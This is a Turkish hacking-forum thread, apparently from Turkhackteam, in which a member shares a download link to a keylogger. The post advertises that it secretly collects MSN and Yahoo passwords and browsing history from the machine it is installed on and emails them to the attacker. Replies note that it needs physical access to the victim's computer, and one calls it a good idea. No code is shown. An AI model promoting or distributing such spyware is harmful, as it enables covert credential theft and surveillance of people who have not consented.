bi çeşit keylogger

atlas_tr

Kıdemli Üye
8 Ocak 2008
2,380
14
NErDe OLsam BEğeNİRsin
Kurulduğu bilgisayardaki tüm msn, yahoo vs şifreleri alıp gizlice size gönderir !!!! Ayrıca bilgisayarda neler olup bitmiş, hangi sitelere girilmiş bütün hepsini kaydeder ve sizin belirlediğiniz mail adresine gönderir... Kısacası harikaaa bir program diyebilirim. Çok beğeneceksiniz !!!!

https://tik.lat/34A0q

alıntıdır ama aşağıdaki sözler bana ait

arkadaşlar bence bu pro fazla bir işe yaramaz okuduğum kadarıyla proyu sen ellerinle karşı pcye kurmalısın eee ben kurbanın pcsine pro kurabiliyorsam yani pc elimin altında ise ben neden pro kullanayım şimdii siz diyeceksizin o zaman sen neden bunu buraya koydun şimdi ""hangi sitelere girilmiş bütün hepsini kaydeder""bu sözler nedeniyle .....

ks_ugur

Yeni üye
27 Tem 2008
8
0
link tee bir sorun var galiba kardeş ben girmedim ama güzel fikir aklıma yattı...:twist

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.